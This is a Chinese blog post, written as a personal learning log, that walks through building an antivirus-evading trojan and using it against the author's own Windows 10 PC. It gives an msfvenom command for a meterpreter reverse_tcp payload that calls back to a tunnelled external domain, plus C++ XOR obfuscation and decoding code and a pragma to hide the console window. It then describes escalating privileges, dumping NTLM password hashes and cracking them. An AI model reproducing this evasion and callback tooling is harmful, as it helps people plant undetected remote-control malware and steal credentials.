学习记录:内网穿透+ShellCode+C++语言二次编译 免杀绕过火绒 渗透Win10提取密码

最新推荐文章于 2024-06-17 17:04:42 发布
最新推荐文章于 2024-06-17 17:04:42 发布
阅读量2.4k 收藏 44
点赞数 11
分类专栏: 信息安全 文章标签: 学习 c++ 火绒安全 网络安全 系统安全 windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60709081/article/details/131358267
版权

学习记录:内网穿透+ShellCode+C++语言二次编译 免杀绕过火绒 渗透Win10提取密码

0x00 写在最前

第二次学习记录,有点紧张。
主要目标:获取我电脑的密码。
本次尝试学习网上的一个shellcode免杀,绕过火绒杀毒,完成一次对Win10的渗透。
(放心,没有让目标系统上当运行木马的内容)
还扩展到利用花生壳提供的内网穿透功能实现对其他局域网设备的反弹shell连接。

0x01 环境介绍

  • 攻击机:Kali (虚拟机)
  • 靶机: Windows 10 22H2 版本 10.0.19045(物理机)
  • 工具:MSF,VS,花生壳
    简化网络拓扑图如下:
    在这里插入图片描述

0x02 虚拟机网络设置

Kali为虚拟机,需要先设置虚拟机的网络模式为桥接模式。
我使用的是VMware,设置如下:
1.打开虚拟网络编辑器。
在这里插入图片描述

2.设置名叫“VMnet1”的虚拟交换机为桥接模式。
在这里插入图片描述
3.再打开Kali的编辑虚拟机设置,在网卡设置选项选择连接VMnet1。
在这里插入图片描述

0x03 内网穿透

笔者只有一台PC,所以只能暂时让靶机和攻击机在同一个局域网,不过也能验证内网穿透的可行性。
打开花生壳,新建映射,设置如下:
在这里插入图片描述

完成设置后检测连接发现内网服务未接通,当然不急,待会儿打开Kali的监听。

0x04 免杀木马

shellcode在维基百科上的意思:

shellcode是一段用于利用软件漏洞而执行的代码。

说人话就是,只要在目标电脑上执行这段shellcode,就可以控制这台电脑。

使用msfvenom生成C语言shellcode,使用x86/shikata_ga_nai编码15次。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 \b '\x00' lhost=xxxxxx.imdo.co lport=xxxx -f c

拿到shellcode输出如下:
在这里插入图片描述
当前的shellcode肯定是过不掉杀软的,还需要深层的免杀。
免杀的姿势有很多种,笔者还是小白,暂时只会尝试特征码免杀(加油! >﹏<)
为了避免被火绒等安全软件通过特征码识别到恶意代码,所以通过C++二次编译。
借鉴了这篇博客,适合我这种小白,在此感谢!
链接: link
通过简单加密shellcode,等到执行时再解密:

#include <iostream>

using namespace std;

unsigned char buf[] =
"\xb8\x3a\xb4\x71\xa4\xd9\xcf\xd9\x74\x24\xf4\x5b\x33\xc9"
"\xb1\xb8\x31\x43\x12\x83\xc3\..........................."
//这里放刚刚生成的shellcode

int main() 
{
	string s;
	for (size_t i = 0; i < sizeof(buf); i++)
	{
		int n = buf[i] ^ 0x44; //这里的密码可以换
		char c[5]{};
		sprintf_s(c, "\\x%x", n);
		s += c;
	}
	cout << s << endl;

	return 0;
}

解密代码:

for (size_t i = 0; i < sizeof(buf); i++)
{
	((unsigned char*)b)[i] ^= 0x44;
}

完整的代码在刚在那个博客链接里面,我就不多写了,大致这样形状(~ ̄▽ ̄)~:
在这里插入图片描述

如果想让木马运行时不跳出cmd窗口(那肯定不能跳出来啊),可以在源代码开头加上这句:

#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )

为了不让编译器优化机制坏我们的好事,在设置中关闭编译器优化。
在这里插入图片描述

至此,只要编译源代码,免杀木马就完成了。
(刚才的源代码中,还要靠的是对VirtualAlloc函数的神秘调用,这个我就还不懂了啊啊啊,所以,免杀果然还不是小白可以碰的〒▽〒,不过不会写代码,我还不会运行代码吗,谁不是从脚本小子过来的呢,勿喷)

0x05 上线目标

在Kali端打开msf,建立监听:
在这里插入图片描述
运行免杀木马,全程火绒静态+动态免杀!目标上线!
在这里插入图片描述

胜利第一步!!

查看系统信息:
请添加图片描述

接下来迁移进程:
请添加图片描述
不要忘了咱们的目的:获取目标密码
获取密码,就需要system权限,getsystem失败,我尝试了msf自带的其他几个bypassuac,虽然可以提升到系统权限,但是它会上传一个程序,然而,那个程序被火绒干掉了,时间关系,只能暂时关闭杀软来继续之后的操作了,等我有时间在学习一下提权。

0x06 获取密码

在提权成功后:
请添加图片描述
提取用户密码hash值,需要解密:
请添加图片描述
这串输出的格式:

用户名:SID:LM哈希:NTLM哈希:::

然后,只要把NTLM哈希到免费的解密网站就可以试出来了:
请添加图片描述
对的,就是我的电脑密码。Nice!
顺便用msf截个图:
请添加图片描述
可以,至此结束一段深夜的学习。

0x07 总结

通过C++二次编译制作免杀木马,绕过火绒检测,实现对靶机的控制,windows本地提权,获取并破解用户密码。
今天又进步了一点点,之后打算去打基础了,一步一步来。
但毕竟做任何事都要有些动力的,做一个ScriptsKids反倒可以增加自己的兴趣和动力呢。🎉✨

免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。

VHK701
关注
专栏目录
JsLoader:js免杀shellcode绕过杀毒添加自启
05-05
【JsLoader:js免杀shellcode绕过杀毒添加自启】 JsLoader是一种恶意软件技术,它利用JavaScript代码来加载和执行恶意payload,目的是在用户计算机上绕过反病毒软件的检测并实现持久化。JavaScript由于其普遍存在...
c语言渗透测试,C/S架构渗透测试流程
weixin_34785304的博客
05-18 1295
前言为什么要写了,主要是因为每个月都会突然有一个项目,是有C/S架构的系统要渗透测试,所以其实记笔记,下次打开来看着流程测就完事了。正文1.检查是否加壳C/S架构渗透,我个人理解中说到底就是逆向,所以第一步,首先就是查壳。这个挺简单,C/C++,delphi,VBasic这类语言的,可以使用exeinfope,PEID等软件就可以了,通常没加壳的软件都会如下图一样,直接显示是用什么语言编写的。如果...
免杀入门---shellcode免杀
LvHLong的博客
05-03 5550
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 免杀 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。 杀毒软件工作原理 市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
免杀基本知识,shellcode混淆免杀
最新发布
白帽子凯哥聊黑客
06-17 1297
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
shellCode免杀技巧
qq_39330735的博客
05-15 2637
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
内网穿透的实现
u010905359的博客
03-11 424
这个例子中,我们在本地8080端口启动了一个Netty服务端,然后连接到远程主机的80端口。当有数据从本地端口接收时,会将数据发送到远程主机,反之亦然。
C++对称NAT网络穿透原理与实现
hh1226968736的博客
02-19 1596
C++对称NAT网络穿透原理与实现,只适用于线性分配端口的对称NAT网络,对于随机的对称NAT或者更加复杂的类型估计无法成功
ShellCode免杀的一些方法
qq_68890680的博客
06-26 644
申请内存空间:VirtualAlloc(在调用进程的虚拟地址空间中保留、提交或更改页面区域的状态分配的内存初始化为零)、VirtualAlloc2(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。该函数将其分配的内存初始化为零)、VirtualAllocEx(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。常见的加密解密方式:AES加密、hex加密、XOR+base64加密、Base85+XOR+RC4。加载方式:基础加载,纤程加载,远程加载。
基于python pyd的shellcode免杀绕过+源代码+文档说明
12-01
根据目前的测试效果,可以绕过360和火绒。 -------- 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! <项目介绍> 1、该资源内项目代码都经过测试...
绕过AV:免杀shellcode加载器
03-04
条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go...
记一次绕过火绒安全提权实战案例1
08-03
绕过火绒安全提权实战案例1 绕过火绒安全提权实战案例1是指在 Windows 2008 R2 服务器上,绕过火绒安全软件的限制,获取服务器权限的实战案例。该案例中,服务器上安装了多种安全防护软件,包括火绒、护卫神、安全...
关于域渗透免杀对抗思考及其常见方式
03-16
### 关于域渗透免杀对抗思考及其常见方式 #### 一、域渗透概述 **域**(Domain)是Windows网络中的一个独立运行单位,它不仅代表了一个逻辑组织单元,而且还是Internet上的逻辑组织单元。在Windows网络操作系统...
Shellcode免杀对抗(C/C++)
热门推荐
qq_74806534的博客
02-17 2万+
这里便是杀毒软件杀毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果杀毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台杀毒软件都有了已经,所有我们就要用新的,特征没有被锁定。
C语言Windows公网转发工具(内网穿透
cjc19940113的博客
09-25 1462
C语言Windows公网转发工具(内网穿透
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1389
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
内网穿透工具
nicedante的博客
06-16 548
内网穿透工具 文章目录前言思路部署示例交互逻辑 前言   为了使服务后台程序能够在内网机器里有更好的体验,可以使用内网穿透,让外网用户也可以访问到该机器上的服务后台程序。 思路   我的想法是通过公网服务器转发的方式实现内网穿透。需要实现两个工具,我分别称它们为:代理服务后台、代理客户端。我把实际上的服务器称为:真正的服务后台。   代理服务后台,顾名思义就是在公网服务器上跑一个服务程序,外网用户只需要连接该服务程序即可达到和直接连接真正的服务后台相同的效果。   代理客户端,就是,在一台既可以连接到代理服
内网渗透之隐藏通信隧道技术
qq_48904485的博客
04-27 5408
一、隐藏通信隧道基础知识 1、隐藏通信隧道概述 一般的网络通信,先在两台机器之间建立TCP连接,然后进行正常的数据通信。在知道IP地址的情况下,可以直接发送报文;如果不知道IP地址,就需要将域名解析成IP地址。在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至人侵检测系统来检查对外连接的情况,如果发现异常,就会对通信进行阻断。 这里的隧道,是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据
C#实现内网穿透详细步骤
孤狼
04-29 5814
1.在web项目上右键->属性->web 点击创建虚拟目录 启动项目 2.项目启动之后,打开右下角的IIS Express,->右键->显示所有程序->选择相应的项目-> 下方出现配置和链接->点击 3.找到对应路径applicationhost.config 此时会打开IIS Express 的配置文件 app...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值